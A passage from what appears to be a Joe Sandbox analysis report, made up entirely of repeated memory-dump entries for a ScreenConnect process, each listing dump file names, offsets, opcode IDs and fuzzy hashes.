                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 17e3fc7b7694ac477d47dacb704f9e338b1eae299552f43e17f9376d8d7473e9
                                                                                                                                                                                                  • Instruction ID: 9bc38ec623dd5c9577e8d4eb0dee51d5337103bfc88b46e40f8b4ebcc3de6c4b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17e3fc7b7694ac477d47dacb704f9e338b1eae299552f43e17f9376d8d7473e9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D318431B002098FDB55DFA9C454AAEF7F6EF89354F108469E546E7390DB70EE058790
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 0f266d47a18831f9802ca1f6bc803b333c375056b7ce40e3bf3eac0f15ec1c4d
                                                                                                                                                                                                  • Instruction ID: 95f3d7744a0e7cfecf7b56226d1d4d0aea6acc77cf017ddc0d71f258d74fe7a4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f266d47a18831f9802ca1f6bc803b333c375056b7ce40e3bf3eac0f15ec1c4d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94418B30B102098FCB55DF69D858AAEB7F6BF88714B11856CE40ADB3A1DF709D44CB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1ac77a5bb5ae61195d0c830d84b49f131e61d75c9ba77f911514aa2075041df6
                                                                                                                                                                                                  • Instruction ID: 161252c9f00aaaf5f369294cecb61a28bc98b4ecb7595da4f478ab748d1b279f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ac77a5bb5ae61195d0c830d84b49f131e61d75c9ba77f911514aa2075041df6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25317A71D003099FDB14DFAAD844BEEFBF4EF89320F10846AD519A7240D778A9458FA5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 78a6645e7f397d59281612662006cde9f2aee41b879cf1da2a4b2387971384a1
                                                                                                                                                                                                  • Instruction ID: 379533060c1a54183fc0a51d8d24dd82eccdde732321e19ee4027ad7b7c4a914
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78a6645e7f397d59281612662006cde9f2aee41b879cf1da2a4b2387971384a1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02311A346007058FD771DF29C844A6AB7F1AF89324B248A2CE466DB7A5E730E956CF80
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596143766.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_17ad000_ScreenConnect.jbxd
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 54ae2032765250e8c59f5440cb2070603e2d311da95f365fca7fc93b7a2f029f
                                                                                                                                                                                                  • Instruction ID: 7dd0f7d57bc8bba3b1c11b02cf9af7515ba716e41aa1b52f82755f5e794c0018
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54ae2032765250e8c59f5440cb2070603e2d311da95f365fca7fc93b7a2f029f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51114270B002099FCB01EF65DC859AFB7B5FFC9210B508529E519DB354EB30ED058B95
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 12d06f73572069778f4500a3c51e36f6ee4b859a860146db6f5b9b96b14a2fbc
                                                                                                                                                                                                  • Instruction ID: 73462b5d7e6b0818b907a35f00221208856f7f527e9c6509862d55dce6a59624
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12d06f73572069778f4500a3c51e36f6ee4b859a860146db6f5b9b96b14a2fbc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8111931A006098FDB25DF59C959BAFBBF5AF89305F14486DD406EB390DB719E048B90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596143766.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_17ad000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                                                                                                                                                                                  • Instruction ID: e05167870f72eb9b8d88c4f4711a63c311b399c4a6d60e9fe7167c7cd9eaaacd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B911AFB6504284CFCB16CF54D9C4B56FF72FB88314F2886A9D9090B657C336D45ACBA2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e98553698a253aad39cfed28c0ee32ced541a1d1ca60760daa55c487bab0c9a9
                                                                                                                                                                                                  • Instruction ID: 67bfbf6d2ff46a2d7d7c172977d05d0194f380a7f37420316cca2c219471fb5a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e98553698a253aad39cfed28c0ee32ced541a1d1ca60760daa55c487bab0c9a9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B72103B5C007499FDB10CF9AD844BEEFBF4EB48324F15842AD919A7240D3B8A645CFA5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9f9e778ced071d9cc1491053041df68001f9c3ef590340bfb24f015792b21d79
                                                                                                                                                                                                  • Instruction ID: 85c1d4bce5cf49a8f54aa668c8cf9e969a26303210146bed6994dc884601c18c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f9e778ced071d9cc1491053041df68001f9c3ef590340bfb24f015792b21d79
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1601B5312097554FC306CB78DC819967BF5DF862603198666F448CF7A1DA34EC07C761
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 44b8f6eb321f4dc78eae1eeaa0700b1d3121d156f6fed8b8758f7d8d85733df6
                                                                                                                                                                                                  • Instruction ID: 38ccc3d7d0d8d5b5632d824e9abb96eda7f4c4c1a2abbcfdd24205e0815b8291
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44b8f6eb321f4dc78eae1eeaa0700b1d3121d156f6fed8b8758f7d8d85733df6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D11247690021ADFCF00DFA4C980ADEBBF5FF49704F108555E904BB250D771AA1ACB91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 22f1ab0160401c0b497cac4e0bb1d1a5efcb1f36f27d99432e382b09a56e6a4a
                                                                                                                                                                                                  • Instruction ID: 6d68a58a4d70a2e2673dd912cb6eb51121433298f5ea01a1c8224f9fba2932ba
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22f1ab0160401c0b497cac4e0bb1d1a5efcb1f36f27d99432e382b09a56e6a4a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5018F777440148B8788DA6DF894A7EB3AAFBC8635328C43BEA09C7351CA32DC138754
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d4f695ef4da1a65c1fcfa2ce62ea3c6caaac0bfe8d994a7459f2a9725f9babda
                                                                                                                                                                                                  • Instruction ID: e703ee30fa9ef3af4c270a18413fcc8047fca5deaf09721ec4a5792f363003af
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4f695ef4da1a65c1fcfa2ce62ea3c6caaac0bfe8d994a7459f2a9725f9babda
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9119D3190020E9FCB42DFA8C880ADDFBB2BF86304B48C554D005AB155D730AA86CB61
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ce173cc582291faf70d2176fda85caa8b65d065ed09ea1ac88211f03c9b036f7
                                                                                                                                                                                                  • Instruction ID: 6345c2b5deb2989ba20ff8147dcdad2ba8b8f5d152472c71dbbf0e7371202b31
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce173cc582291faf70d2176fda85caa8b65d065ed09ea1ac88211f03c9b036f7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8111571E0520D8FEF15DBA4C8A1BED77B2AB8A300F004569D002BB3A0DB781A45CBA1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 25352b0bf2bdce08d33de32302816cb8d8e5bee8a312052f14d6738592f14a0c
                                                                                                                                                                                                  • Instruction ID: 66e5ecbdd280daaf80fea086a2e13a595d5ec6c855e07a99384119afc96bf8f5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25352b0bf2bdce08d33de32302816cb8d8e5bee8a312052f14d6738592f14a0c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B11D671A0421D8FEF55DFA4D8646EDB7B1AF8E310F000469D005BB2A0DB781A44CBA1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: af5f2edeb3ac8e3e35ab7776d6cd2cd73daf31adcafdb9bc087caa006a0cebef
                                                                                                                                                                                                  • Instruction ID: f0a1561c6ac564a0ea6e107a6b9d95bbfed41e439f7e424183cc9d32486a419f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: af5f2edeb3ac8e3e35ab7776d6cd2cd73daf31adcafdb9bc087caa006a0cebef
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB11123690120A9FCF00DFA4D9409DEBBF5FF49714B108569D509BB250D771AA0ACB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 4b9fe03f1e3cbae332257a86d3bc53e12588897d1eef27db0fd1109dd74eb8c9
                                                                                                                                                                                                  • Instruction ID: 19cf6add748e8388be7f49d5f09957a69d47167163fb7e1e1375ff7348f2507e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b9fe03f1e3cbae332257a86d3bc53e12588897d1eef27db0fd1109dd74eb8c9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97012671B003196BCB49DA5DEC444AFB7EAFBC8220320492AD105CB341EBB1DD0687C4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 12dc8cc7bd8580f79bb084554e6f0434bae7bdae89f9226aa5de102d6d555478
                                                                                                                                                                                                  • Instruction ID: 7adcc4668b068ee8ed918896e5db08111dbd3f3f37cdccdec118a026a0d5d765
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12dc8cc7bd8580f79bb084554e6f0434bae7bdae89f9226aa5de102d6d555478
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D401F9B29492408FC712C7B8ECE97C8BBE4EE52225709049AD585CB602D3752647CB92
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596143766.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_17ad000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 51dd52dd9cb0cfa1c86b6a85c29fe813550d5944fbccd10a9b8ac1e0ad0ac6f8
                                                                                                                                                                                                  • Instruction ID: fd081ab6ca99445e4c9170f40499c335fa91004949d5251f9248c43d700ee43a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51dd52dd9cb0cfa1c86b6a85c29fe813550d5944fbccd10a9b8ac1e0ad0ac6f8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0101F2315447409FE7208AA5C984B67FF98EF812A4F58C25AED484A682C2B99801CAB2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 5cc4c4bb47b8bd1848d67e20c2178015e9670d5cd011da0a34a7189bfd8a8558
                                                                                                                                                                                                  • Instruction ID: 42ba5c62e233bf359c5e5653b79e6f5c5ccc6c260f6ca6a0b7233a8ae4edea4d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cc4c4bb47b8bd1848d67e20c2178015e9670d5cd011da0a34a7189bfd8a8558
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E201F76290E3DD8FC3438B748CA8661BFA1EE5235430C45DEE485CF1E3E794AA02D342
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: bb022f68b8749672f871e38e2c19e79146828bdd6526604360388ce64235e990
                                                                                                                                                                                                  • Instruction ID: dba7e1b94412408ade0106e227a45f132e7a78479f6888155417041b95e81e1e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb022f68b8749672f871e38e2c19e79146828bdd6526604360388ce64235e990
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4201693190121D9BCB05EFA9D804ACEFBB2FF89314F048466E9057B250D730690ACB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1e5418e0d3a01c95289899897ebb4375e1b4768d1bb7c621ea79491d05554f07
                                                                                                                                                                                                  • Instruction ID: 7d569da501e46b435ec58e27c285f43431109bbe25ffd97e6016ba90c7723091
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e5418e0d3a01c95289899897ebb4375e1b4768d1bb7c621ea79491d05554f07
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02F0B433A4E2844FC7174B799C955953FB4DD8622130E01E7E449CB243D5145C0AC760
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3fbef39ce66377b2aa7fc5165fe07627fc3fb093ee550bc2f72a2a36f6d4bc48
                                                                                                                                                                                                  • Instruction ID: d8216c0f2fa752941fe576dad402fe9cb57fc6e6ae391e46b1c3fd996d3af5b1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fbef39ce66377b2aa7fc5165fe07627fc3fb093ee550bc2f72a2a36f6d4bc48
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95012C31D0125D9BCB04DFA9D8049CEFBB6FFC9714F058526D505B7250DB306906CB94
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1293dfd2172c0614e2c9e447cc1b50c184e8ba42cac780e6dfd0a37c71624836
                                                                                                                                                                                                  • Instruction ID: d0c2341dced5d778f71ae4e1f0979bdd41593c87a68d5f5cf339b6ac2932a4cc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1293dfd2172c0614e2c9e447cc1b50c184e8ba42cac780e6dfd0a37c71624836
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EF062313007155FD714DF69DC84B5BB7EAEF892A0B00462AF808CB294DB71EC418790
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a3008e43f7c04965981e67b53cf2601b383051ad6ddc126a8321db7eef0369a7
                                                                                                                                                                                                  • Instruction ID: 29410a3eb5b7b9805a9cdf631e5c90f5696f9f30fcc33e23d17568260f6ae7b7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3008e43f7c04965981e67b53cf2601b383051ad6ddc126a8321db7eef0369a7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11019E70C0434A8FCB52CF68C89566D7FF0AF06320F24429AD465DB292E3348252CF91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 539095a0c98e12691e5fa90e5e15942c88f44ef740948c05270fddd5c357f893
                                                                                                                                                                                                  • Instruction ID: 118408eb4a6d3191c5d3dd017384a884fbe747c08fae8ef35a8a024e7122042e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 539095a0c98e12691e5fa90e5e15942c88f44ef740948c05270fddd5c357f893
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98F05836B092085BE728CAAEA800A9BBBDACBC4620B14C07FE54DC3680E931A5008764
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596143766.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_17ad000_ScreenConnect.jbxd
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36F0F974D0021E8FDBA5DFACC845A6E7BF0AB04320F204759D529D7291F73486518B91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 07bd905c7d25bc2712a4578cd2ecca4488a23e1271a1bc9c3b25b1a682b78921
                                                                                                                                                                                                  • Instruction ID: 92cbb2bcbd3113c00b741a5e51015d6f7f0161b3641ebee31fb56ff4b99422f7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07bd905c7d25bc2712a4578cd2ecca4488a23e1271a1bc9c3b25b1a682b78921
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55E0303670860D6B4B45CA4ED810D5BBBAADBC9360714C42AF849C7351DA31D90187A5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d175bbb6ab596bd7bafe9aacbb27bb04ba5c8215bac32d040147e7473ce130c4
                                                                                                                                                                                                  • Instruction ID: 16c1e79d56e36d987285b8986b66382b65fc5252fe49cdfa4e9c0b70b2d04369
